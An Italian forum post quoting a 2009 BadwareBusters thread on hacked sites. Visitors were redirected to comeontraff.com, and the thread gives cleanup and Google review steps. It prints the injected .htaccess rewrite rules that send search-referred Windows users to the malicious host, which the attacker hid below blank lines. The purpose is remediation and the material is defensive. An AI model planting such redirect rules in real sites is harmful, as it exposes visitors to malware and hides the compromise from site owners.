19 dicembre 09, 11:00
|
#9 (permalink)
Top |
| Sospeso
Data registr.: 09-07-2009
Messaggi: 187
| Citazione:
Originalmente inviato da SlowFlyer  Probabilmente l'algoritmo di Google ogni tanto sbaglia | È improbabile.
[ Is infected my site or my hosting provider? - BadwareBusters] Citazione:
by redleg about 20 hours ago
This hack has been very pervasive, has hit many servers and individual sites. In most cases the hosting service has cleaned up the problem but some individual sites are still infected.
First check to see if your site remains infected. You can use a tool that shows redirects like Rex Swain at Rex Swain's HTTP Viewer
Enter your URL and be sure to enter Google in the box labeled
Referer (optional)
If your site is still infected in the results you will see the page redirected to the malicious site comeontraff.com
If your site is not redirected go ahead and submit a request for review with Google. To remove a malware warning you must Request a Review in the Google Webmaster Tools Account for the site. Google Webmaster Tools can be accessed at this link
https://www.google.com/webmasters/tools/
If you do not all ready have a WMT account for the site you can create one
Access Google WMT at the link above
Then click the Add the site to Google Webmaster Tools button
Follow the directions to Verify ownership of the site
Once you have an account and verified ownership of the site
Click the link for the site which will take you to the Dashboard for the site
Click the link [ More Details ] from the red malware warning bar
Click the link Request a Review and submit the requested information.
Ref
FAQ: Malware and hacked sites (Google Webmaster Help)
If your site does redirect you need to check a file named .htaccess for suspicious redirects. Todate all of the infected sites have found the following code in their .htaccess file
RewriteEngine On
RewriteCond %{HTTP_COOKIE} !^.psessid=234845.$
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .ask.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteCond %{HTTP_USERAGENT} .Windows.$ [NC]
RewriteRule .* http:// comeontraff . com / go.php?sid=9 [R,L,CO=psessid:234845:%{HTTPHOST}:86400]
In most cases the hacker has inserted 100s of blank lines after any legitimate content in the file then inserted the hack lines. Be sure that you have scrolled down to the very bottom of the file. Once you have removed the redirect you will also need to follow the instructions above to remove the malware warning.
Good Luck
| Citazione:
by Kaleh about 19 hours ago
It was not a Google False Positive
these sites were clearly showing redirects yesterday.
It is possible for the hosting provider to fix such a problem without admitting that the problem existed.
| Citazione:
by Frankie about 6 hours ago
Today everything seems back to normal
The Italian provider DADA has probably been hacked 2 days ago (as it had a down of around 10 minutes) and the support staff kept telling people that the provider was totally OK and that the culprit were the PCs of the owner of the websites have been infected
funny that the support staff dindt even tell people to verify their DBs
Now, I wonder if DADA/Register.it will ever tell us what really happened and if they really solved their vulnerabilities
Shouldnt they be legally liable for telling a lie to us and not helping us to solve a situation that they were responsible and that caused us loosing tens of thousands of visitors?
Anyway my suggestions is: DO NOT USE DADA or REGISTER.IT hosting till they explain us what happened and what they have done to solve the problem!!
| |
|  |